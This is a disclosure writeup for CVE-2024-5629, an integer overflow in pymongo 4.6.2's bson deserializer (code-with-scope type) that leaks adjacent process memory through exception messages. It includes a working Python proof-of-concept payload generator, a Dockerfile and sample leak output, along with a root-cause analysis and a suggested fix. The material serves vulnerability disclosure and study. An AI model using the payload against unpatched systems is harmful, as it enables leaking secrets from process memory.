CVE-2024-5629 writeup
Overview
Assigned CVE: CVE-2024-5629
Snyk advisory: SNYK-PYTHON-PYMONGO-7172112
GitHub advisory: GHSA-m87m-mmvp-v9qm
GitHub commit: PYTHON-4305 Fix bson size check (#1564)
Package details
Package manager: pip
Affected module: pymongo
GitHub repo: mongodb/mongo-python-driver
Module description:
The PyMongo distribution contains tools for interacting with MongoDB database from Python. The bson package is an implementation of the BSON format for Python. The pymongo package is a native Python driver for MongoDB. The gridfs package is a gridfs implementation on top of pymongo.
Vulnerability description
Out-of-bounds read in the bson module. Possible risk: leak of sensitive data.
Vulnerability: integer overflow in BSON deserialization. With a crafted payload, an attacker can force the parser to deserialize unmanaged memory. The parser tries to interpret the bytes located right after the buffer and throws an exception that contains them as a string. If those bytes cannot be decoded as UTF-8, the parser throws an exception that reveals a single byte instead.
Vulnerability details
The source code of the affected version is here: https://github.com/mongodb/mongo-python-driver/tree/4.6.2
The vulnerability is located in the file bson/_cbsonmodule.c. The interesting part is the deserialization of type 15 (JavaScript code with scope):
case 15:
    {
        uint32_t c_w_s_size;
        uint32_t code_size;
        uint32_t scope_size;
        PyObject* code;
        PyObject* scope;
        PyObject* code_type;
        if (max < 8) {
            goto invalid;
        }
        memcpy(&c_w_s_size, buffer + *position, 4);
        c_w_s_size = BSON_UINT32_FROM_LE(c_w_s_size);
        *position += 4;
        if (max < c_w_s_size) {
            goto invalid;
        }
        memcpy(&code_size, buffer + *position, 4);
        code_size = BSON_UINT32_FROM_LE(code_size);
        /* code_w_scope length + code length + code + scope length */
        if (!code_size || max < code_size || max < 4 + 4 + code_size + 4) {
            goto invalid;
        }
        *position += 4;
        /* Strings must end in \0 */
        if (buffer[*position + code_size - 1]) {
            goto invalid;
        }
        code = PyUnicode_DecodeUTF8(
            buffer + *position, code_size - 1,
            options->unicode_decode_error_handler);
        if (!code) {
            goto invalid;
        }
        *position += code_size;
        memcpy(&scope_size, buffer + *position, 4);
        scope_size = BSON_UINT32_FROM_LE(scope_size);
        if (scope_size < BSON_MIN_SIZE) {
            Py_DECREF(code);
            goto invalid;
        }
        /* code length + code + scope length + scope */
        if ((4 + code_size + 4 + scope_size) != c_w_s_size) {
            Py_DECREF(code);
            goto invalid;
        }
        /* Check for bad eoo */
        if (buffer[*position + scope_size - 1]) {
            goto invalid;
        }
        scope = elements_to_dict(self, buffer + *position + 4,
                                 scope_size - 5, options);
        if (!scope) {
            Py_DECREF(code);
            goto invalid;
        }
        *position += scope_size;
        if ((code_type = _get_object(state->Code, "bson.code", "Code"))) {
            value = PyObject_CallFunctionObjArgs(code_type, code, scope, NULL);
            Py_DECREF(code_type);
        }
        Py_DECREF(code);
        Py_DECREF(scope);
        break;
    }
The “code with scope” type contains the function code itself (usually JavaScript) and its scope, where the scope is a mapping of the variables captured by the closure. The code is straightforward, so I won’t describe it in detail.
The vulnerable part is here:
/* code length + code + scope length + scope */
if ((4 + code_size + 4 + scope_size) != c_w_s_size) {
    Py_DECREF(code);
    goto invalid;
}
Please note that the variables code_size, scope_size, and c_w_s_size are controlled by the attacker, since they are stored in the input buffer as 4-byte integers. Since all of them are uint32_t integers, it’s possible to trigger an integer overflow here. We can set scope_size to a “negative” value (for an unsigned integer this means a very large value) and bypass the check using crafted code_size and c_w_s_size values.
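The wraparound can be checked by hand with the values used in the PoC payload. The snippet below is a minimal sketch that models uint32_t arithmetic in Python by masking to 32 bits; the helper name passes_size_check is hypothetical and only mirrors the comparison quoted above, it is not part of pymongo.

```python
MASK32 = 0xFFFFFFFF  # uint32_t arithmetic wraps modulo 2**32


def passes_size_check(code_size: int, scope_size: int, c_w_s_size: int) -> bool:
    """Model of `(4 + code_size + 4 + scope_size) != c_w_s_size` in uint32_t.

    Hypothetical helper: returns True when the C code would NOT jump to `invalid`.
    """
    total = (4 + code_size + 4 + scope_size) & MASK32
    return total == c_w_s_size


# Values taken from the PoC payload.
code_size = 0x00000004
scope_size = 0xFFFFFFFE
c_w_s_size = 0x0000000A

true_sum = 4 + code_size + 4 + scope_size  # what the sum "should" be
wrapped_sum = true_sum & MASK32            # what a uint32_t actually holds

print(hex(true_sum))     # 0x10000000a
print(hex(wrapped_sum))  # 0xa
print(passes_size_check(code_size, scope_size, c_w_s_size))  # True
```

The true sum does not fit into 32 bits, so the high bit is dropped and the result equals the attacker-chosen c_w_s_size.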
Then scope_size - 5 is passed to the elements_to_dict() function as the length of the scope document. If the value is big enough, the function will deserialize the unmanaged memory located right after the buffer. This memory will be interpreted as a BSON structure with the fields “type” and “fieldname”. If the “type” is an invalid value (for example \x00), bson throws an exception that contains the “fieldname” string.
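The effect of the inflated length can be illustrated with a toy model. This is only a sketch under loud assumptions: process memory is modelled as one Python bytes object in which the managed buffer is followed by unrelated data, and read_element_header is a hypothetical stand-in for the first step of element parsing, not the real elements_to_dict().

```python
def read_element_header(memory: bytes, position: int, limit: int) -> tuple[int, str]:
    """Toy parser step: read a type byte and a NUL-terminated field name.

    `limit` plays the role of the length that the real parser trusts.
    """
    if position >= limit:
        raise ValueError("end of document reached")
    element_type = memory[position]
    name_end = memory.index(b"\x00", position + 1)
    fieldname = memory[position + 1:name_end].decode("utf-8")
    return element_type, fieldname


managed = b"bytes that belong to the payload"  # the buffer handed to the parser
adjacent = b"\x00" + b"SECRET\x00"             # assumed neighbouring memory
memory = managed + adjacent

position = len(managed)  # parser has consumed the whole managed buffer

# With an honest limit the parser stops at the end of the buffer.
try:
    read_element_header(memory, position, limit=len(managed))
    stopped = False
except ValueError:
    stopped = True

# With a limit derived from scope_size = 0xFFFFFFFE it keeps reading.
inflated_limit = (0xFFFFFFFE - 5) & 0xFFFFFFFF
leaked = read_element_header(memory, position, limit=inflated_limit)

print(stopped)  # True
print(leaked)   # (0, 'SECRET')
```

Type 0 is not a valid element type, so a real parser would report an error at this point, and the error text is where the field name ends up.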
An example trigger (from the PoC file):
bytes.fromhex(
    struct.pack('<I', length).hex() +  # payload size
    '0f' +  # type "code with scope"
    '3100' +  # key (cstring)
    '0a000000' +  # c_w_s_size
    '04000000' +  # code_size
    '41004200' +  # code (cstring)
    'feffffff' +  # scope_size
    '02' +  # type "string"
    '3200' +  # key (cstring)
    struct.pack('<I', string_size).hex() +  # string size
    '00' * string_size  # value (cstring)
    # the next bytes are read as a field name for type \x00
    # type \x00 is invalid so bson throws an exception
)
The last ‘00’ byte is interpreted as type \x00, and the next bytes (located after the managed buffer) are interpreted as the fieldname. Since type \x00 is invalid, the parser throws an exception that contains the fieldname.
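To make the layout easier to follow, the same bytes can be built with struct.pack and read back at fixed offsets. This is a minimal sketch: build_payload and describe_header are hypothetical helper names, and the offsets are simply derived from the field order of the trigger above.

```python
import struct


def build_payload(length: int) -> bytes:
    """Same bytes as the trigger above, built field by field."""
    string_size = length - 0x1E  # 0x1E = 30 bytes of fixed fields
    return (
        struct.pack("<I", length)         # offset 0:  payload size
        + b"\x0f"                         # offset 4:  type "code with scope"
        + b"1\x00"                        # offset 5:  key (cstring)
        + struct.pack("<I", 0x0A)         # offset 7:  c_w_s_size
        + struct.pack("<I", 0x04)         # offset 11: code_size
        + b"A\x00B\x00"                   # offset 15: code (cstring)
        + struct.pack("<I", 0xFFFFFFFE)   # offset 19: scope_size
        + b"\x02"                         # offset 23: type "string"
        + b"2\x00"                        # offset 24: key (cstring)
        + struct.pack("<I", string_size)  # offset 26: string size
        + b"\x00" * string_size           # offset 30: value (cstring)
    )


def describe_header(payload: bytes) -> dict:
    """Read the attacker-controlled size fields back from the payload."""
    (total,) = struct.unpack_from("<I", payload, 0)
    c_w_s_size, code_size = struct.unpack_from("<II", payload, 7)
    (scope_size,) = struct.unpack_from("<I", payload, 19)
    return {
        "total": total,
        "type": payload[4],
        "c_w_s_size": c_w_s_size,
        "code_size": code_size,
        "code": payload[15:19],
        "scope_size": scope_size,
    }


payload = build_payload(0x50)
header = describe_header(payload)
print(len(payload) == header["total"])  # True
print(hex(header["scope_size"]))        # 0xfffffffe
```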
Suggested fix
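The c_w_s_size variable gets a dedicated bounds check against max:
if (max < c_w_s_size) {
    goto invalid;
}
I would suggest adding the same kind of check for the code_size and scope_size variables (code_size is already compared against max as part of a larger condition, but scope_size is never compared against max at all). Then it becomes impossible to trigger the integer overflow here.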
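The suggested order of checks can be sketched as a small Python model. This is an illustration of the idea only, not the upstream patch: sizes_are_valid is a hypothetical name, BSON_MIN_SIZE = 5 is an assumption about the constant used in the C source, and Python integers do not wrap, so the final sum is exact here by construction.

```python
BSON_MIN_SIZE = 5  # assumed: int32 length + EOO byte, the smallest BSON document


def sizes_are_valid(max_size: int, c_w_s_size: int,
                    code_size: int, scope_size: int) -> bool:
    """Hypothetical model: bound every size by max_size before summing."""
    if max_size < 8 or c_w_s_size > max_size:
        return False
    if code_size == 0 or code_size > max_size:
        return False
    if scope_size < BSON_MIN_SIZE or scope_size > max_size:
        return False
    # Each term is now bounded by max_size, so a huge scope_size
    # can no longer be used to wrap the sum around.
    return 4 + code_size + 4 + scope_size == c_w_s_size


# PoC values are rejected: scope_size is far larger than the buffer.
print(sizes_are_valid(0x50, 0x0A, 4, 0xFFFFFFFE))  # False

# A consistent element passes: 4 + 4 + 4 + 5 == 17.
print(sizes_are_valid(0x50, 17, 4, 5))  # True
```

In C, the same effect requires either checks like these before the addition or performing the addition in a wider integer type.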
How it was found
Deserialization is usually non-trivial and difficult to implement without bugs. I read the entire bson code carefully, paying particular attention to the use of integer variables, and found this by chance.
How to reproduce
I’ve tested it on Ubuntu 22.04.3 LTS, kernel version: 5.15.0-84-generic.
There is a simple PoC:
import bson
import struct


def function(length: int) -> None:
    secret = b'X' * length
    # do some stuff with secret
    # ...
    # variable 'secret' is deleted here
    # but it's still stored in memory


def generate_payload(length: int) -> bytes:
    string_size = length - 0x1e
    return bytes.fromhex(
        struct.pack('<I', length).hex() +  # payload size
        '0f' +  # type "code with scope"
        '3100' +  # key (cstring)
        '0a000000' +  # c_w_s_size
        '04000000' +  # code_size
        '41004200' +  # code (cstring)
        'feffffff' +  # scope_size
        '02' +  # type "string"
        '3200' +  # key (cstring)
        struct.pack('<I', string_size).hex() +  # string size
        '00' * string_size  # value (cstring)
        # the next bytes are read as a field name for type \x00
        # type \x00 is invalid so bson throws an exception
    )


def deserialize_payload(payload: bytes) -> None:
    try:
        obj = bson.decode(payload)  # throws exception
        print(obj)  # unreachable code
    except Exception as e:
        print(e)


print('## case 1: leak the printable string ##')
# uses secret internally
function(0x50 + 0x0F)
# payload could be read from stdin or similar
payload = generate_payload(0x50)
deserialize_payload(payload)

###
print('\n## case 2: leak some non-printable bytes ##')
for i in range(5):
    # payload could be read from stdin or similar
    payload = generate_payload(0x54f + i)
    deserialize_payload(payload)
The PoC contains two cases:
- leak of a previously used variable; an arbitrary string from memory could be leaked the same way
- leak of 5 single non-printable bytes
You can use the provided Dockerfile to reproduce the environment:
FROM python:3.12@sha256:e83d1f4d0c735c7a54fc9dae3cca8c58473e3b3de08fcb7ba3d342ee75cfc09d
RUN pip install pymongo==4.6.2
COPY poc.py /tmp/poc.py
ENTRYPOINT python3 -u /tmp/poc.py
- Build the image
docker build --tag pymongo-poc .
- Run the image
docker run --rm pymongo-poc
- Expected behaviour
$ docker run --rm pymongo-poc
## case 1: leak the printable string ##
Detected unknown BSON type b'\x00' for fieldname 'XXXXXXXXXXXXXX'. Are you using the latest driver version?
## case 2: leak some non-printable bytes ##
'utf-8' codec can't decode byte 0x90 in position 1: invalid start byte
'utf-8' codec can't decode byte 0xfc in position 0: invalid start byte
'utf-8' codec can't decode byte 0x98 in position 0: invalid start byte
'utf-8' codec can't decode byte 0xf7 in position 0: invalid start byte
'utf-8' codec can't decode byte 0xff in position 0: invalid start byte
Please note that XXXXXXXXXXXXXX is a part of the secret variable. The bytes [0x90, 0xfc, 0x98, 0xf7, 0xff] could be consecutive bytes from process memory.
Conclusion
The bug has been fixed in v4.6.3, changelog: https://pymongo.readthedocs.io/en/4.7.0/changelog.html#changes-in-version-4-6-3
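A quick way to check whether an environment already contains the fix is to compare the installed version against 4.6.3. The sketch below uses hypothetical helper names and treats every version below 4.6.3 as unpatched, which is an assumption: this writeup only confirms 4.6.2 as vulnerable.

```python
from importlib import metadata

FIXED_IN = (4, 6, 3)  # first release containing the fix, per the changelog


def parse_version(version: str) -> tuple[int, ...]:
    """Keep the leading numeric components, e.g. '4.7.0.dev0' -> (4, 7, 0)."""
    parts = []
    for piece in version.split("."):
        digits = ""
        for ch in piece:
            if not ch.isdigit():
                break
            digits += ch
        if not digits:
            break
        parts.append(int(digits))
    return tuple(parts)


def is_patched(version: str) -> bool:
    """True when the version is at least 4.6.3."""
    parsed = parse_version(version)
    padded = parsed + (0,) * (3 - len(parsed))  # '4.7' -> (4, 7, 0)
    return padded[:3] >= FIXED_IN


def installed_pymongo_is_patched():
    """Return None when pymongo is not installed in this environment."""
    try:
        return is_patched(metadata.version("pymongo"))
    except metadata.PackageNotFoundError:
        return None


print(is_patched("4.6.2"))  # False
print(is_patched("4.6.3"))  # True
```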